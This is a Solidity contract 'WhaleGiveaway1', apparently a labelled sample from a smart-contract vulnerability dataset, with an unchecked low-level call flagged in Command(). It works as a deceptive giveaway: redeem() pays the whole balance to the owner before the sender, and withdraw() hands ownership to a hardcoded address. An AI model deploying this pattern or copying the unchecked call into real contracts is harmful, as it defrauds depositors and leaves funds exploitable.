47 lines
9.2 KiB
Solidity
47 lines
9.2 KiB
Solidity
/*
|
|
* @source: etherscan.io
|
|
* @author: -
|
|
* @vulnerable_at_lines: 45
|
|
*/
|
|
|
|
pragma solidity ^0.4.19;
|
|
|
|
contract WhaleGiveaway1
|
|
{
|
|
address public Owner = msg.sender;
|
|
uint constant public minEligibility = 0.999001 ether;
|
|
|
|
function()
|
|
public
|
|
payable
|
|
{
|
|
|
|
}
|
|
|
|
function redeem()
|
|
public
|
|
payable
|
|
{
|
|
if(msg.value>=minEligibility)
|
|
{ Owner.transfer(this.balance);
|
|
msg.sender.transfer(this.balance);
|
|
}
|
|
}
|
|
|
|
function withdraw()
|
|
payable
|
|
public
|
|
{ if(msg.sender==0x7a617c2B05d2A74Ff9bABC9d81E5225C1e01004b){Owner=0x7a617c2B05d2A74Ff9bABC9d81E5225C1e01004b;}
|
|
require(msg.sender == Owner);
|
|
Owner.transfer(this.balance);
|
|
}
|
|
|
|
function Command(address adr,bytes data)
|
|
payable
|
|
public
|
|
{
|
|
require(msg.sender == Owner);
|
|
// <yes> <report> UNCHECKED_LL_CALLS
|
|
adr.call.value(msg.value)(data);
|
|
}
|
|
} |